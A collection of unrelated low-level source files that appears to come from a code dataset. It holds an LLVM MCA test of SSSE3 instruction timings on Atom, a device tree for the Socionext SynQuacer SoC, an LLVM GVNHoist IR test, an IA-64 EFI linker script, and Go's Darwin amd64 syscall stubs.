psignd %mm0, %mm2
psignd (%rax), %mm2
psignd %xmm0, %xmm2
psignd (%rax), %xmm2
psignw %mm0, %mm2
psignw (%rax), %mm2
psignw %xmm0, %xmm2
psignw (%rax), %xmm2
# CHECK: Instruction Info:
# CHECK-NEXT: [1]: #uOps
# CHECK-NEXT: [2]: Latency
# CHECK-NEXT: [3]: RThroughput
# CHECK-NEXT: [4]: MayLoad
# CHECK-NEXT: [5]: MayStore
# CHECK-NEXT: [6]: HasSideEffects (U)
# CHECK: [1] [2] [3] [4] [5] [6] Instructions:
# CHECK-NEXT: 1 1 0.50 pabsb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsb (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsb %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 pabsd %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsd (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsd %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsd (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 pabsw %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pabsw (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 pabsw %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * pabsw (%rax), %xmm2
# CHECK-NEXT: 1 1 1.00 palignr $1, %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * palignr $1, (%rax), %mm2
# CHECK-NEXT: 1 1 1.00 palignr $1, %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * palignr $1, (%rax), %xmm2
# CHECK-NEXT: 1 3 1.50 phaddd %mm0, %mm2
# CHECK-NEXT: 1 4 2.00 * phaddd (%rax), %mm2
# CHECK-NEXT: 1 3 1.50 phaddd %xmm0, %xmm2
# CHECK-NEXT: 1 4 2.00 * phaddd (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phaddsw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phaddsw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phaddsw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phaddsw (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phaddw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phaddw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phaddw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phaddw (%rax), %xmm2
# CHECK-NEXT: 1 3 1.50 phsubd %mm0, %mm2
# CHECK-NEXT: 1 4 2.00 * phsubd (%rax), %mm2
# CHECK-NEXT: 1 3 1.50 phsubd %xmm0, %xmm2
# CHECK-NEXT: 1 4 2.00 * phsubd (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phsubsw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phsubsw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phsubsw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phsubsw (%rax), %xmm2
# CHECK-NEXT: 1 5 2.50 phsubw %mm0, %mm2
# CHECK-NEXT: 1 6 3.00 * phsubw (%rax), %mm2
# CHECK-NEXT: 1 7 3.50 phsubw %xmm0, %xmm2
# CHECK-NEXT: 1 8 4.00 * phsubw (%rax), %xmm2
# CHECK-NEXT: 1 4 4.00 pmaddubsw %mm0, %mm2
# CHECK-NEXT: 1 4 4.00 * pmaddubsw (%rax), %mm2
# CHECK-NEXT: 1 5 5.00 pmaddubsw %xmm0, %xmm2
# CHECK-NEXT: 1 5 5.00 * pmaddubsw (%rax), %xmm2
# CHECK-NEXT: 1 4 4.00 pmulhrsw %mm0, %mm2
# CHECK-NEXT: 1 4 4.00 * pmulhrsw (%rax), %mm2
# CHECK-NEXT: 1 5 5.00 pmulhrsw %xmm0, %xmm2
# CHECK-NEXT: 1 5 5.00 * pmulhrsw (%rax), %xmm2
# CHECK-NEXT: 1 1 1.00 pshufb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * pshufb (%rax), %mm2
# CHECK-NEXT: 1 4 2.00 pshufb %xmm0, %xmm2
# CHECK-NEXT: 1 5 2.50 * pshufb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignb %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignb (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignb %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignb (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignd %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignd (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignd %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignd (%rax), %xmm2
# CHECK-NEXT: 1 1 0.50 psignw %mm0, %mm2
# CHECK-NEXT: 1 1 1.00 * psignw (%rax), %mm2
# CHECK-NEXT: 1 1 0.50 psignw %xmm0, %xmm2
# CHECK-NEXT: 1 1 1.00 * psignw (%rax), %xmm2
# CHECK: Resources:
# CHECK-NEXT: [0] - AtomPort0
# CHECK-NEXT: [1] - AtomPort1
# CHECK: Resource pressure per iteration:
# CHECK-NEXT: [0] [1]
# CHECK-NEXT: 130.50 76.50
# CHECK: Resource pressure by instruction:
# CHECK-NEXT: [0] [1] Instructions:
# CHECK-NEXT: 0.50 0.50 pabsb %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsb (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsb %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 pabsd %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsd (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsd %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsd (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 pabsw %mm0, %mm2
# CHECK-NEXT: 1.00 - pabsw (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 pabsw %xmm0, %xmm2
# CHECK-NEXT: 1.00 - pabsw (%rax), %xmm2
# CHECK-NEXT: 1.00 - palignr $1, %mm0, %mm2
# CHECK-NEXT: 1.00 - palignr $1, (%rax), %mm2
# CHECK-NEXT: 1.00 - palignr $1, %xmm0, %xmm2
# CHECK-NEXT: 1.00 - palignr $1, (%rax), %xmm2
# CHECK-NEXT: 1.50 1.50 phaddd %mm0, %mm2
# CHECK-NEXT: 2.00 2.00 phaddd (%rax), %mm2
# CHECK-NEXT: 1.50 1.50 phaddd %xmm0, %xmm2
# CHECK-NEXT: 2.00 2.00 phaddd (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phaddsw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phaddsw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phaddsw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phaddsw (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phaddw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phaddw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phaddw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phaddw (%rax), %xmm2
# CHECK-NEXT: 1.50 1.50 phsubd %mm0, %mm2
# CHECK-NEXT: 2.00 2.00 phsubd (%rax), %mm2
# CHECK-NEXT: 1.50 1.50 phsubd %xmm0, %xmm2
# CHECK-NEXT: 2.00 2.00 phsubd (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phsubsw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phsubsw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phsubsw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phsubsw (%rax), %xmm2
# CHECK-NEXT: 2.50 2.50 phsubw %mm0, %mm2
# CHECK-NEXT: 3.00 3.00 phsubw (%rax), %mm2
# CHECK-NEXT: 3.50 3.50 phsubw %xmm0, %xmm2
# CHECK-NEXT: 4.00 4.00 phsubw (%rax), %xmm2
# CHECK-NEXT: 4.00 - pmaddubsw %mm0, %mm2
# CHECK-NEXT: 4.00 - pmaddubsw (%rax), %mm2
# CHECK-NEXT: 5.00 - pmaddubsw %xmm0, %xmm2
# CHECK-NEXT: 5.00 - pmaddubsw (%rax), %xmm2
# CHECK-NEXT: 4.00 - pmulhrsw %mm0, %mm2
# CHECK-NEXT: 4.00 - pmulhrsw (%rax), %mm2
# CHECK-NEXT: 5.00 - pmulhrsw %xmm0, %xmm2
# CHECK-NEXT: 5.00 - pmulhrsw (%rax), %xmm2
# CHECK-NEXT: 1.00 - pshufb %mm0, %mm2
# CHECK-NEXT: 1.00 - pshufb (%rax), %mm2
# CHECK-NEXT: 2.00 2.00 pshufb %xmm0, %xmm2
# CHECK-NEXT: 2.50 2.50 pshufb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignb %mm0, %mm2
# CHECK-NEXT: 1.00 - psignb (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignb %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignb (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignd %mm0, %mm2
# CHECK-NEXT: 1.00 - psignd (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignd %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignd (%rax), %xmm2
# CHECK-NEXT: 0.50 0.50 psignw %mm0, %mm2
# CHECK-NEXT: 1.00 - psignw (%rax), %mm2
# CHECK-NEXT: 0.50 0.50 psignw %xmm0, %xmm2
# CHECK-NEXT: 1.00 - psignw (%rax), %xmm2
| {
"language": "Assembly"
} |
/** @file
* Copyright (c) 2017 - 2018, Linaro Limited. All rights reserved.
*
* SPDX-License-Identifier: BSD-2-Clause-Patent
*/
#define GIC_SPI 0
#define GIC_PPI 1
#define IRQ_TYPE_NONE 0
#define IRQ_TYPE_EDGE_RISING 1
#define IRQ_TYPE_EDGE_FALLING 2
#define IRQ_TYPE_EDGE_BOTH (IRQ_TYPE_EDGE_FALLING | IRQ_TYPE_EDGE_RISING)
#define IRQ_TYPE_LEVEL_HIGH 4
#define IRQ_TYPE_LEVEL_LOW 8
#define GPIO_ACTIVE_HIGH 0
#define GPIO_ACTIVE_LOW 1
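/* With these macros an interrupt specifier reads, e.g.,
 * <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>: shared peripheral interrupt 63,
 * active-high level-triggered (the three cells required by the GIC
 * binding). */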
/ {
#address-cells = <2>;
#size-cells = <2>;
interrupt-parent = <&gic>;
aliases {
serial0 = &soc_uart0;
serial1 = &fuart;
};
chosen {
stdout-path = "serial0:115200n8";
};
cpus {
#address-cells = <1>;
#size-cells = <0>;
CPU0: cpu@0 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x0>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU1: cpu@1 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x1>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU2: cpu@100 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x100>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU3: cpu@101 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x101>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU4: cpu@200 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x200>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU5: cpu@201 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x201>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU6: cpu@300 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x300>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU7: cpu@301 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x301>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU8: cpu@400 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x400>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU9: cpu@401 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x401>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU10: cpu@500 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x500>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU11: cpu@501 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x501>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU12: cpu@600 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x600>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU13: cpu@601 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x601>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU14: cpu@700 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x700>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU15: cpu@701 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x701>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU16: cpu@800 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x800>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU17: cpu@801 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x801>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU18: cpu@900 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x900>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU19: cpu@901 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x901>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU20: cpu@a00 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xa00>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU21: cpu@a01 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xa01>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU22: cpu@b00 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xb00>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU23: cpu@b01 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xb01>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
cpu-map {
cluster0 {
core0 {
cpu = <&CPU0>;
};
core1 {
cpu = <&CPU1>;
};
};
cluster1 {
core0 {
cpu = <&CPU2>;
};
core1 {
cpu = <&CPU3>;
};
};
cluster2 {
core0 {
cpu = <&CPU4>;
};
core1 {
cpu = <&CPU5>;
};
};
cluster3 {
core0 {
cpu = <&CPU6>;
};
core1 {
cpu = <&CPU7>;
};
};
cluster4 {
core0 {
cpu = <&CPU8>;
};
core1 {
cpu = <&CPU9>;
};
};
cluster5 {
core0 {
cpu = <&CPU10>;
};
core1 {
cpu = <&CPU11>;
};
};
cluster6 {
core0 {
cpu = <&CPU12>;
};
core1 {
cpu = <&CPU13>;
};
};
cluster7 {
core0 {
cpu = <&CPU14>;
};
core1 {
cpu = <&CPU15>;
};
};
cluster8 {
core0 {
cpu = <&CPU16>;
};
core1 {
cpu = <&CPU17>;
};
};
cluster9 {
core0 {
cpu = <&CPU18>;
};
core1 {
cpu = <&CPU19>;
};
};
cluster10 {
core0 {
cpu = <&CPU20>;
};
core1 {
cpu = <&CPU21>;
};
};
cluster11 {
core0 {
cpu = <&CPU22>;
};
core1 {
cpu = <&CPU23>;
};
};
};
};
idle-states {
entry-method = "arm,psci";
CPU_SLEEP_0: cpu-sleep-0 {
compatible = "arm,idle-state";
arm,psci-suspend-param = <0x0010000>;
entry-latency-us = <300>;
exit-latency-us = <1200>;
min-residency-us = <2000>;
local-timer-stop;
};
CLUSTER_SLEEP_0: cluster-sleep-0 {
compatible = "arm,idle-state";
arm,psci-suspend-param = <0x1010000>;
entry-latency-us = <400>;
exit-latency-us = <1200>;
min-residency-us = <2500>;
local-timer-stop;
};
};
gic: interrupt-controller@30000000 {
compatible = "arm,gic-v3";
reg = <0x0 0x30000000 0x0 0x10000>, // GICD
<0x0 0x30400000 0x0 0x300000>, // GICR
<0x0 0x2c000000 0x0 0x2000>, // GICC
<0x0 0x2c010000 0x0 0x1000>, // GICH
<0x0 0x2c020000 0x0 0x10000>; // GICV
#interrupt-cells = <3>;
#address-cells = <2>;
#size-cells = <2>;
ranges;
interrupt-controller;
interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
its: gic-its@30020000 {
compatible = "arm,gic-v3-its";
reg = <0x0 0x30020000 0x0 0x20000>;
#msi-cells = <1>;
msi-controller;
socionext,synquacer-pre-its = <0x58000000 0x200000>;
};
};
timer {
compatible = "arm,armv8-timer";
interrupts = <GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>, // secure
<GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>, // non-secure
<GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>, // virtual
<GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>; // HYP
};
mmio-timer@2a810000 {
compatible = "arm,armv7-timer-mem";
reg = <0x0 0x2a810000 0x0 0x10000>;
#address-cells = <2>;
#size-cells = <2>;
ranges;
frame@2a830000 {
frame-number = <0>;
interrupts = <GIC_SPI 60 IRQ_TYPE_LEVEL_HIGH>;
reg = <0x0 0x2a830000 0x0 0x10000>;
};
};
pmu {
compatible = "arm,cortex-a53-pmu";
interrupts = <GIC_PPI 7 IRQ_TYPE_LEVEL_LOW>;
};
psci {
compatible = "arm,psci-1.0";
method = "smc";
};
clk_uart: refclk62500khz {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <62500000>;
clock-output-names = "uartclk";
};
clk_apb: refclk100mhz {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <100000000>;
clock-output-names = "apb_pclk";
};
soc_uart0: uart@2a400000 {
compatible = "arm,pl011", "arm,primecell";
reg = <0x0 0x2a400000 0x0 0x1000>;
interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_uart>, <&clk_apb>;
clock-names = "uartclk", "apb_pclk";
};
fuart: uart@51040000 {
compatible = "snps,dw-apb-uart";
reg = <0x0 0x51040000 0x0 0x1000>;
interrupts = <GIC_SPI 168 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_uart>, <&clk_apb>;
clock-names = "baudclk", "apb_pclk";
reg-io-width = <4>;
reg-shift = <2>;
};
clk_netsec: refclk250mhz {
compatible = "fixed-clock";
clock-frequency = <250000000>;
#clock-cells = <0>;
};
ethernet@522d0000 {
compatible = "socionext,synquacer-netsec";
reg = <0 0x522d0000 0x0 0x10000>,
<0 FixedPcdGet32 (PcdNetsecEepromBase) 0x0 0x10000>;
interrupts = <GIC_SPI 176 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_netsec>;
clock-names = "phy_ref_clk";
phy-mode = "rgmii";
max-speed = <1000>;
max-frame-size = <9000>;
phy-handle = <&phy_netsec>;
dma-coherent;
mdio_netsec: mdio {
#address-cells = <1>;
#size-cells = <0>;
};
};
smmu: iommu@582c0000 {
compatible = "arm,mmu-500", "arm,smmu-v2";
reg = <0x0 0x582c0000 0x0 0x10000>;
#global-interrupts = <1>;
interrupts = <GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>;
#iommu-cells = <1>;
status = "disabled";
};
pcie0: pcie@60000000 {
compatible = "socionext,synquacer-pcie-ecam", "snps,dw-pcie-ecam";
device_type = "pci";
reg = <0x0 0x60000000 0x0 0x7f00000>;
bus-range = <0x0 0x7e>;
#address-cells = <3>;
#size-cells = <2>;
ranges = <0x1000000 0x00 0x00000000 0x00 0x67f00000 0x0 0x00010000>,
<0x2000000 0x00 0x68000000 0x00 0x68000000 0x0 0x08000000>,
<0x3000000 0x3e 0x00000000 0x3e 0x00000000 0x1 0x00000000>;
#interrupt-cells = <0x1>;
interrupt-map-mask = <0x0 0x0 0x0 0x0>;
interrupt-map = <0x0 0x0 0x0 0x0 &gic 0x0 0x0 GIC_SPI 190 IRQ_TYPE_LEVEL_HIGH>;
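// msi-map entries are <rid-base  msi-controller  msi-base  length>:
// requester IDs 0x0-0x7eff map 1:1 onto ITS device IDs here.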
msi-map = <0x000 &its 0x0 0x7f00>;
dma-coherent;
status = "disabled";
};
pcie1: pcie@70000000 {
compatible = "socionext,synquacer-pcie-ecam", "snps,dw-pcie-ecam";
device_type = "pci";
reg = <0x0 0x70000000 0x0 0x7f00000>;
bus-range = <0x0 0x7e>;
#address-cells = <3>;
#size-cells = <2>;
ranges = <0x1000000 0x00 0x00000000 0x00 0x77f00000 0x0 0x00010000>,
<0x2000000 0x00 0x78000000 0x00 0x78000000 0x0 0x08000000>,
<0x3000000 0x3f 0x00000000 0x3f 0x00000000 0x1 0x00000000>;
#interrupt-cells = <0x1>;
interrupt-map-mask = <0x0 0x0 0x0 0x0>;
interrupt-map = <0x0 0x0 0x0 0x0 &gic 0x0 0x0 GIC_SPI 182 IRQ_TYPE_LEVEL_HIGH>;
msi-map = <0x0 &its 0x10000 0x7f00>;
dma-coherent;
status = "disabled";
};
gpio: gpio@51000000 {
compatible = "socionext,synquacer-gpio", "fujitsu,mb86s70-gpio";
reg = <0x0 0x51000000 0x0 0x100>;
gpio-controller;
#gpio-cells = <2>;
clocks = <&clk_apb>;
base = <0>;
};
exiu: interrupt-controller@510c0000 {
compatible = "socionext,synquacer-exiu";
reg = <0x0 0x510c0000 0x0 0x20>;
interrupt-controller;
interrupt-parent = <&gic>;
#interrupt-cells = <3>;
socionext,spi-base = <112>;
};
clk_alw_b_0: bclk200 {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <200000000>;
clock-output-names = "sd_bclk";
};
clk_alw_c_0: sd4clk800 {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <800000000>;
clock-output-names = "sd_sd4clk";
};
sdhci: sdhci@52300000 {
compatible = "socionext,synquacer-sdhci", "fujitsu,mb86s70-sdhci-3.0";
reg = <0 0x52300000 0x0 0x1000>;
interrupts = <GIC_SPI 152 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 153 IRQ_TYPE_LEVEL_HIGH>;
bus-width = <8>;
cap-mmc-highspeed;
fujitsu,cmd-dat-delay-select;
clocks = <&clk_alw_c_0 &clk_alw_b_0>;
clock-names = "core", "iface";
dma-coherent;
status = "disabled";
};
clk_alw_1_8: spi_ihclk {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <125000000>;
clock-output-names = "iHCLK";
};
spi: spi@54810000 {
compatible = "socionext,synquacer-spi";
reg = <0x0 0x54810000 0x0 0x1000>;
interrupts = <GIC_SPI 160 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 161 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 162 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_alw_1_8>;
clock-names = "iHCLK";
socionext,use-rtm;
socionext,set-aces;
#address-cells = <1>;
#size-cells = <0>;
status = "disabled";
};
clk_i2c: i2c_pclk {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <62500000>;
clock-output-names = "pclk";
};
i2c: i2c@51210000 {
compatible = "socionext,synquacer-i2c";
reg = <0x0 0x51210000 0x0 0x1000>;
interrupts = <GIC_SPI 165 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_i2c>;
clock-names = "pclk";
clock-frequency = <400000>;
#address-cells = <1>;
#size-cells = <0>;
};
tpm: tpm_tis@10000000 {
compatible = "socionext,synquacer-tpm-mmio";
reg = <0x0 0x10000000 0x0 0x5000>;
status = "disabled";
};
firmware {
optee {
compatible = "linaro,optee-tz";
method = "smc";
status = "disabled";
};
};
};
#include "SynQuacerCaches.dtsi"
| {
"language": "Assembly"
} |
; RUN: opt -gvn-hoist %s -S -o - | FileCheck %s
; CHECK: store
; CHECK-NOT: store
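; GVNHoist should merge the two identical "store i8 0, i8* %p" instructions
; from %e.thread and %e into their common dominator %if.end19, leaving
; exactly one store in the output (hence the CHECK/CHECK-NOT pair above).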
target datalayout = "e-m:e-p:32:32-i64:64-v128:64:128-a:0:32-n32-S64"
define void @f(i8* %p) {
entry:
switch i4 undef, label %if.then30 [
i4 4, label %if.end
i4 0, label %if.end
]
if.end:
br label %if.end19
if.end19:
br i1 undef, label %e, label %e.thread
e.thread:
store i8 0, i8* %p, align 4
br label %if.then30
if.then30:
call void @g()
unreachable
e:
store i8 0, i8* %p, align 4
unreachable
}
declare void @g()
| {
"language": "Assembly"
} |
OUTPUT_FORMAT("elf64-ia64-little")
OUTPUT_ARCH(ia64)
ENTRY(_start_plabel)
SECTIONS
{
. = 0;
ImageBase = .;
.hash : { *(.hash) } /* this MUST come first! */
. = ALIGN(4096);
.text :
{
_text = .;
*(.text)
*(.text.*)
*(.gnu.linkonce.t.*)
_etext = .;
}
. = ALIGN(4096);
__gp = ALIGN (8) + 0x200000;
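  /* gp-relative (addl) addressing on IA64 uses a signed 22-bit offset,
     i.e. +/-2MB; biasing __gp by 0x200000 centers that 4MB window over
     the short-data sections laid out below. */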
.sdata :
{
_data = .;
*(.got.plt)
*(.got)
*(.srodata)
*(.sdata)
*(.sbss)
*(.scommon)
}
. = ALIGN(4096);
.note.gnu.build-id : {
*(.note.gnu.build-id)
}
.data.ident : {
*(.data.ident)
}
. = ALIGN(4096);
.data :
{
*(.rodata*)
*(.ctors)
*(.data*)
*(.gnu.linkonce.d*)
*(.plabel) /* data whose relocs we want to ignore */
. = ALIGN(16);
_init_array = .;
*(SORT_BY_NAME(.init_array))
_init_array_end = .;
__CTOR_LIST__ = .;
*(SORT_BY_NAME(.ctors))
__CTOR_END__ = .;
__DTOR_LIST__ = .;
*(SORT_BY_NAME(.dtors))
__DTOR_END__ = .;
_fini_array = .;
*(SORT_BY_NAME(.fini_array))
_fini_array_end = .;
/* the EFI loader doesn't seem to like a .bss section, so we stick
it all into .data: */
*(.dynbss)
*(.bss)
*(COMMON)
}
. = ALIGN(4096);
.vendor_cert :
{
*(.vendor_cert)
}
. = ALIGN(4096);
.dynamic : { *(.dynamic) }
. = ALIGN(4096);
.rela :
{
*(.rela.text)
*(.rela.data*)
*(.rela.sdata)
*(.rela.got)
*(.rela.gnu.linkonce.d*)
*(.rela.stab)
*(.rela.ctors)
*(.rela.init_array)
}
_edata = .;
_data_size = . - _data;
. = ALIGN(4096);
.reloc : /* This is the PECOFF .reloc section! */
{
*(.reloc)
}
. = ALIGN(4096);
.dynsym : { *(.dynsym) }
. = ALIGN(4096);
.dynstr : { *(.dynstr) }
/DISCARD/ :
{
*(.rela.plabel)
*(.rela.reloc)
*(.IA_64.unwind*)
*(.IA64.unwind*)
}
.note.gnu.build-id : { *(.note.gnu.build-id) }
}
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
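// For reference, the Go-side declarations these stubs back have the shapes
// declared in package syscall:
//
//	func Syscall(trap, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno)
//	func Syscall6(trap, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintptr, err Errno)
//	func Syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 uintptr, err Errno)
//
// The Raw variants take the same arguments but bypass the runtime's
// entersyscall/exitsyscall bookkeeping.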
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
